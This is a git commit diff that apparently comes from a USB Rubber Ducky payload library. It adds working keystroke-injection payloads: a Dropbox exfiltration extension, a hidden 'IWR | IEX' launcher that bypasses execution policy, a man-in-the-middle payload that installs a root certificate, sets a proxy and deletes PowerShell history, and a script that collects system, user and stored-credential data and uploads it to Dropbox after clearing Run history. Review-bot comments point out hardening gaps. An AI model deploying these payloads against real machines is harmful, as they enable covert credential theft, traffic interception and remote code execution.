commit
1bdf62bc7e
|
@ -0,0 +1,43 @@
|
|||
EXTENSION POWERSHELL_TO_DROPBOX
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: PowerShell To Dropbox
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.1
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #PTD_CONTENT $Content
|
||||
DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
|
||||
DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
|
||||
|
||||
FUNCTION PTD_SEND()
|
||||
STRING_POWERSHELL
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = "#PTD_REFRESH_TOKEN";
|
||||
"client_id" = "#PTD_APP_KEY";
|
||||
"client_secret" = "#PTD_APP_SECRET"
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body #PTD_CONTENT | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
END_STRING
|
||||
END_FUNCTION
|
||||
END_EXTENSION
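Review bot: The DOCUMENTATION block does not say that `#PTD_REFRESH_TOKEN`, `#PTD_APP_KEY` and `#PTD_APP_SECRET` are typed in clear text into the target's PowerShell session by `STRING_POWERSHELL`. On a host with PSReadLine history or script block logging enabled they presumably remain readable there after the run. A refresh token is long-lived, and with the app secret it lets whoever reads those records obtain access tokens for the Dropbox app that receives the collected content. I would add a line to the REM_BLOCK such as `Note: the app key, app secret and refresh token are typed on the target; treat them as exposed and revoke the token after each engagement.`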
|
|
@ -1,25 +0,0 @@
|
|||
EXTENSION PowerShell_To_Dropbox
|
||||
|
||||
REM Title: PowerShell_To_Dropbox
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
|
||||
|
||||
|
||||
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
|
||||
STRING REFRESH_TOKEN
|
||||
STRING "; client_id = "
|
||||
STRING APP_KEY
|
||||
STRING "; client_secret = "
|
||||
STRING APP_SECRET
|
||||
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
END_EXTENSION
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
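Review bot: `STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"` executes whatever the URL returns with no integrity check, and the default `example.com` carries no scheme, so the request is presumably made over plain HTTP. With `#RHP_ELEVATED_EXECUTION` set, anything able to alter that response then runs elevated on the assessed host. The default should read `DEFINE #RHP_SCRIPT_URL https://example.com`, and the DOCUMENTATION block should state that only an `https://` URL under the tester's control is acceptable. The elevated branch also sends `LEFT` and `ENTER` after a fixed `DELAY #RHP_DELAY` without any confirmation that the consent prompt has focus, so the block should document that those keys can land in another window. The same extension is embedded unchanged in the Windows Privilege Excalibur payload.txt later in this commit, where the same points apply.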
|
|
@ -0,0 +1,59 @@
|
|||
# Windows Duck In The Middle
|
||||
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic.
|
||||
|
||||
## Process
|
||||
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Creates a new virtual desktop.
|
||||
3. Opens a PowerShell window using the Windows+X menu.
|
||||
4. Runs PowerShell code that performs the following actions:
|
||||
- Downloads your certificate to a temporary file.
|
||||
- *Configures Firefox to accepts root user certificates for each profile.*
|
||||
- Configures and activates the proxy for the current user.
|
||||
- Deletes the temporary certificate file and PowerShell history, then closes the window.
|
||||
5. Confirms the addition of a trusted certificate in the confirmation dialog box.
|
||||
6. Closes the virtual desktop.
|
||||
7. *Disables USB Rubber Ducky*
|
||||
|
||||
> [!NOTE]
|
||||
> No configuration is required for Chromium-based browsers since they accept user root certificates by default.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp).
|
||||
|
||||
> [!WARNING]
|
||||
> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy.
|
||||
|
||||
## Options
|
||||
|
||||
|Required options|Data type|Default value|Description|
|
||||
|-|-|-|-|
|
||||
|CERT_URL|String|example.com|The download link for your Trusted Root CA certificate|
|
||||
|PROXY_IP|String|127.0.0.1|Your proxy's IP address|
|
||||
|PROXY_PORT|Integer|8080|Your proxy port|
|
||||
|
||||
|Advanced options|Data type|Default value|Description|
|
||||
|-|-|-|-|
|
||||
|SHORT_DELAY|Integer|500|Short delay time|
|
||||
|MEDIUM_DELAY|Integer|2000|Medium delay time|
|
||||
|LONG_DELAY|Integer|4000|Long delay time|
|
||||
|CONFIGURE_FIREFOX|Boolean|TRUE|Configures Firefox to accepts root user certificates for each profile|
|
||||
|DISABLE_AFTER_EXECUTION|Boolean|TRUE|Disables USB Rubber Ducky after payload execution|
|
||||
|
||||
## Contributors
|
||||
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
|
@ -0,0 +1,136 @@
|
|||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Duck In The Middle
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sets up a trustworthy proxy for the user, enabling a Man-in-the-middle attack.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
Category: Execution
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #CERT_URL example.com
|
||||
DEFINE #PROXY_IP 127.0.0.1
|
||||
DEFINE #PROXY_PORT 8080
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #SHORT_DELAY 500
|
||||
DEFINE #MEDIUM_DELAY 2000
|
||||
DEFINE #LONG_DELAY 4000
|
||||
DEFINE #CONFIGURE_FIREFOX TRUE
|
||||
DEFINE #DISABLE_AFTER_EXECUTION TRUE
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
CTRL GUI d
|
||||
GUI x
|
||||
|
||||
DELAY #SHORT_DELAY
|
||||
STRING i
|
||||
|
||||
DELAY #MEDIUM_DELAY
|
||||
STRING_POWERSHELL
|
||||
Clear-Host;
|
||||
$c = New-TemporaryFile;
|
||||
try {
|
||||
Invoke-WebRequest -UseBasicParsing -Uri "#CERT_URL" -OutFile $c;
|
||||
Import-Certificate -FilePath $c -CertStoreLocation "Cert:\CurrentUser\Root";
|
||||
END_STRING
|
||||
|
||||
IF_DEFINED_TRUE #CONFIGURE_FIREFOX
|
||||
STRING_POWERSHELL
|
||||
if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles") {
|
||||
Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles" -Filter "prefs.js" -Recurse | ForEach-Object {
|
||||
(Get-Content $_.FullName) -replace '"security.enterprise_roots.enabled", false','"security.enterprise_roots.enabled", true' | Set-Content $_.FullName
|
||||
}
|
||||
};
|
||||
END_STRING
|
||||
END_IF_DEFINED
|
||||
|
||||
STRING_POWERSHELL
|
||||
@{ "ProxyServer" = "#PROXY_IP:#PROXY_PORT"; "ProxyEnable" = "1" }.GetEnumerator() | ForEach-Object {
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name $_.Name -Value $_.Value
|
||||
}
|
||||
}
|
||||
finally {
|
||||
Remove-Item $c;
|
||||
Remove-Item (Get-PSReadLineOption).HistorySavePath;
|
||||
exit
|
||||
}
|
||||
END_STRING
|
||||
|
||||
ENTER
|
||||
|
||||
DELAY #LONG_DELAY
|
||||
ALT TAB
|
||||
|
||||
DELAY #SHORT_DELAY
|
||||
TAB
|
||||
ENTER
|
||||
|
||||
CTRL GUI F4
|
||||
|
||||
IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
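Review bot: The payload leaves the imported certificate in `Cert:\CurrentUser\Root`, the `ProxyServer`/`ProxyEnable` values and the changed Firefox `security.enterprise_roots.enabled` preference in place, and nothing in the DOCUMENTATION block says how to undo them. After an authorized test the account keeps trusting that CA and sending traffic to the proxy address until someone reverts it, so anyone holding the CA's private key can read that user's TLS traffic. I would add a documented restore step covering all three changes: delete the certificate by thumbprint, set `ProxyEnable` back to `0`, and reset the Firefox preference. The `finally` block also runs `Remove-Item (Get-PSReadLineOption).HistorySavePath`, which deletes the user's whole PSReadLine history file rather than this session's lines, and that data loss on the assessed host should be stated in the block. `#CERT_URL` defaults to `example.com` with no scheme, so the file that becomes a trusted root is presumably fetched without transport authentication.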
|
|
@ -1,19 +0,0 @@
|
|||
- **Configure your Dropbox application**
|
||||
|
||||
- Create a Dropbox account.
|
||||
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
|
||||
- Go to the settings of this app and write down your "App key" and "App secret".
|
||||
*These are your "<APP_KEY>" and "<APP_SECRET>".*
|
||||
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
|
||||
- After that, open this link in your browser *(values between brackets must be changed)*.
|
||||
```
|
||||
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
|
||||
```
|
||||
- Connect your application, allow its permissions, and note the code it gives you.
|
||||
*This is your "<APP_CODE>".*
|
||||
- Open a command prompt and run this command *(values between brackets must be changed)*.
|
||||
```
|
||||
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
|
||||
```
|
||||
- Note the "refresh_token" value of the result.
|
||||
*This is your "<REFRESH_TOKEN>".*
|
|
@ -1,48 +1,48 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
|
||||
</a>
|
||||
</h1>
|
||||
## Windows Privilege Excalibur
|
||||
|
||||
## Description
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
||||
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|
||||
|
||||
*The setup needs to be done only once for the payload to work forever.*
|
||||
|Report Category|Useful Resources|
|
||||
|-|-|
|
||||
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
||||
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
||||
|Stored Credentials||
|
||||
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
|
||||
|
||||
## Setup
|
||||
## Process
|
||||
|
||||
> If you already have your <APP_KEY>, <APP_SECRET> and <REFRESH_TOKEN>, you can go directly to the "Prepare your payload" step.
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Opens a Windows Run dialog box.
|
||||
3. Executes a hosted PowerShell script that performs the following actions:
|
||||
- Clears the history of the Windows Run menu.
|
||||
- Prepares a report on target PC user privilege escalation.
|
||||
- Sends the report to a file in your Dropbox.
|
||||
|
||||
- **Configure your Dropbox application**
|
||||
## Prerequisites
|
||||
|
||||
- Follow the instructions in "[DROPBOXSETUP.md](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/DROPBOXSETUP.md)".
|
||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||
|
||||
- **Prepare your payload**
|
||||
> [!WARNING]
|
||||
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||
|
||||
- Download the Powershell script "script.ps1".
|
||||
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
||||
- Upload your modified "script.ps1" file to Dropbox and copy the upload link.
|
||||
- Replace the end of the link from "?dl=0" to "?dl=1"
|
||||
*This is your "<DOWNLOAD_LINK>".*
|
||||
- Download the "payload.txt" file.
|
||||
- Edit it to include your <DOWNLOAD_LINK>.
|
||||
## Options
|
||||
|
||||
## Analysis
|
||||
|Required extension options|Extension|Data type|Default value|Description|
|
||||
|-|-|-|-|-|
|
||||
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
|
||||
|
||||
Once you have your report file, you can use the following resources to help you find ways to escalate your privileges:
|
||||
## Contributors
|
||||
|
||||
| Report Category | Useful Resources |
|
||||
| --- | --- |
|
||||
| System Information | [WES-NG](https://github.com/bitsadmin/wesng) |
|
||||
| User Information | [Priv2Admin](https://github.com/gtworek/Priv2Admin) |
|
||||
| Stored Credentials | |
|
||||
| Installed Programs | [Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com) |
|
||||
|
||||
#### Coming soon...
|
||||
|
||||
- [ ] Windows Services Misconfigurations
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||
|
|
|
@ -1,17 +1,107 @@
|
|||
REM Title: Windows Privilege Excalibur
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis.
|
||||
REM Target: Windows 10, 11
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Privilege Excalibur
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sends you a brief user privilege escalation report via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.3
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
REM Replace DOWNLOAD_LINK with the actual download link of the script.
|
||||
DEFINE DOWNLOAD_LINK example.com
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
||||
STRING DOWNLOAD_LINK
|
||||
STRING ; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
||||
|
|
|
@ -1,6 +1,49 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
$APP_KEY = "XXXXXXXXXXXXXXX"
|
||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||
|
||||
function Send-ToDropbox {
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$Content,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$RefreshToken,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppKey,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppSecret,
|
||||
[string]$OutputFolder = "Exfiltrated-content",
|
||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||
)
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = $RefreshToken;
|
||||
"client_id" = $AppKey;
|
||||
"client_secret" = $AppSecret
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body $Content | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Stored Credentials #`n $(CMDKEY /LIST | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
||||
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
|
||||
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
||||
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
